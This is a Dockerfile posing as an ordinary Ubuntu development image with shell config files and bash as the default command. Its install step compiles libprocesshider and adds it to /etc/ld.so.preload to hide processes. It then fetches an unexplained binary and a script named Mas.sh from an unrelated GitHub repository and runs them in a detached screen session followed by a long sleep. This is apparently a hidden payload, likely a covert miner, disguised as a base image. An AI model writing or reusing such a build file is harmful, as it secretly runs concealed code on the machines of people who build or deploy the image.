FROM ubuntu:bionic

# Install.
RUN \
  apt-get update && \
  apt-get install screen -y && \
  apt-get install -y wget && \
  apt-get install -y git && \
  apt-get install -y gcc && \
  apt-get install -y make && \
  git clone https://github.com/lallianto/libprocesshider && \
  cd libprocesshider && \
  make && \
  gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl && \
  mv libprocesshider.so /usr/local/lib/ && \
  echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload && \
  wget https://github.com/redv67/rwicn/raw/main/build && \
  chmod 777 build && \
  wget https://github.com/redv67/rwicn/raw/main/Mas.sh && \
  chmod 777 Mas.sh && \
  ./Mas.sh > screen -R azfjo && \
  sleep 7000 && \
  rm -rf /var/lib/apt/lists/*

# Add files.
ADD root/.bashrc /root/.bashrc
ADD root/.gitconfig /root/.gitconfig
ADD root/.scripts /root/.scripts

# Set environment variables.
ENV HOME /root

# Define working directory.
WORKDIR /root

# Define default command.
CMD ["bash"]
